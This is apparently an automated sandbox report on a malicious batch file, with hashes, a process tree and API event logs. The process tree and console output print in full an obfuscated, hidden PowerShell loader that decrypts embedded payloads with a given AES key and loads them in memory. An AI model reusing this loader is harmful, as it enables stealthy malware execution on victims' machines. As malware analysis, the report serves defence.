Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 17, 2023, 5:28 p.m.	May 17, 2023, 5:31 p.m.

Size	12.7MB
Type	DOS batch file, ASCII text, with CRLF line terminators
MD5	`6dc2a6dc1065e6407d580c08594267b8`
SHA256	`812dffdac2172940e631b35e88ad6451150cac1c86cd24d74e8fc28c79a65074`
CRC32	`10A84998`
ssdeep	`49152:jDLD/aHzIgbUHYeONpRm6XJKBS+ZZHiBQ9VPyMIEeVjbFRJAjz+Cg0JszdRxPo5S:c`
Yara	anti_vm_detect - Possibly employs anti-virtualization techniques

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "UlbnQhboLBuL" C:\Users\test22\AppData\Local\Temp\Uni.bat
3020
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Uni.bat
  2216
  - Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function BgRxE($XUBfu){ $yHyZa=[System.Security.Cryptography.Aes]::Create(); $yHyZa.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yHyZa.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yHyZa.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7MymoDIuie4tPVsKnVHec+BUrxddCyMvAJR/EwsbVTs='); $yHyZa.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6Jj5qajjJfogZ5gJA2HV7Q=='); $Urbyf=$yHyZa.CreateDecryptor(); $return_var=$Urbyf.TransformFinalBlock($XUBfu, 0, $XUBfu.Length); $Urbyf.Dispose(); $yHyZa.Dispose(); $return_var;}function mliMM($XUBfu){ $vcQqJ=New-Object System.IO.MemoryStream(,$XUBfu); $OYxgY=New-Object System.IO.MemoryStream; $Pmwqm=New-Object System.IO.Compression.GZipStream($vcQqJ, [IO.Compression.CompressionMode]::Decompress); $Pmwqm.CopyTo($OYxgY); $Pmwqm.Dispose(); $vcQqJ.Dispose(); $OYxgY.Dispose(); $OYxgY.ToArray();}function WbAdc($XUBfu,$ghXXD){ $oXpAu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$XUBfu); $chWYo=$oXpAu.EntryPoint; $chWYo.Invoke($null, $ghXXD);}$EsBfp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($yNUfS in $EsBfp) { if ($yNUfS.StartsWith(':: ')) { $xivcY=$yNUfS.Substring(3); break; }}$ofSbM=[string[]]$xivcY.Split('\');$UxsLS=mliMM (BgRxE ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[0])));$IoyMQ=mliMM (BgRxE ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[1])));WbAdc $IoyMQ (,[string[]] (''));WbAdc $UxsLS (,[string[]] (''));
    2368

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA May 17, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW May 17, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 17, 2023, 5:29 p.m.			0	0

Command line console output was observed (27 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: At line:1 char:272 console_handle: 0x0000002f	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: + function BgRxE($XUBfu){ $yHyZa=[System.Security.Cryptography.Aes]::Create(); console_handle: 0x0000003b	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: $yHyZa.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yHyZa.Padding=[Sys console_handle: 0x00000047	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: tem.Security.Cryptography.PaddingMode]::PKCS7; $yHyZa.Key=[System.Convert]::('g console_handle: 0x00000053	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: nirtS46esaBmorF'[-1..-16] -join '')( <<<< '7MymoDIuie4tPVsKnVHec+BUrxddCyMvAJR/ console_handle: 0x0000005f	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: EwsbVTs='); $yHyZa.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')( console_handle: 0x0000006b	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: '6Jj5qajjJfogZ5gJA2HV7Q=='); $Urbyf=$yHyZa.CreateDecryptor(); $return_var=$Urby console_handle: 0x00000077	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: f.TransformFinalBlock($XUBfu, 0, $XUBfu.Length); $Urbyf.Dispose(); $yHyZa.Dispo console_handle: 0x00000083	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: se(); $return_var;}function mliMM($XUBfu){ $vcQqJ=New-Object System.IO.MemorySt console_handle: 0x0000008f	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: ream(,$XUBfu); $OYxgY=New-Object System.IO.MemoryStream; $Pmwqm=New-Object Syst console_handle: 0x0000009b	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: em.IO.Compression.GZipStream($vcQqJ, [IO.Compression.CompressionMode]::Decompre console_handle: 0x000000a7	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: ss); $Pmwqm.CopyTo($OYxgY); $Pmwqm.Dispose(); $vcQqJ.Dispose(); $OYxgY.Dispose( console_handle: 0x000000b3	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: ); $OYxgY.ToArray();}function WbAdc($XUBfu,$ghXXD){ $oXpAu=[System.Reflection.A console_handle: 0x000000bf	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: ssembly]::('daoL'[-1..-4] -join '')([byte[]]$XUBfu); $chWYo=$oXpAu.EntryPoint; console_handle: 0x000000cb	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: $chWYo.Invoke($null, $ghXXD);}$EsBfp=[System.IO.File]::('txeTllAdaeR'[-1..-11] console_handle: 0x000000d7	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: -join '')('C:\Users\test22\AppData\Local\Temp\Uni.bat').Split([Environment]::Ne console_handle: 0x000000e3	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: wLine);foreach ($yNUfS in $EsBfp) { if ($yNUfS.StartsWith(':: ')) { $xivcY=$yNU console_handle: 0x000000ef	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: fS.Substring(3); break; }}$ofSbM=[string[]]$xivcY.Split('\');$UxsLS=mliMM (BgRx console_handle: 0x000000fb	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: E ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[0])));$IoyMQ=mliMM console_handle: 0x00000107	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: (BgRxE ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[1])));WbAdc $I console_handle: 0x00000113	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: oyMQ (,[string[]] (''));WbAdc $UxsLS (,[string[]] ('')); console_handle: 0x0000011f	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x0000012b	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: ecordException console_handle: 0x00000137	1	1
WriteConsoleW May 17, 2023, 5:29 p.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x00000143	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dad80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005daf00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005daf00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005daf00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da5c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da5c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da5c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dacc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 17, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005da940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 17, 2023, 5:29 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0235a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02352000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02362000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02981000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02982000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02363000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02364000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0235b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02365000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02366000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
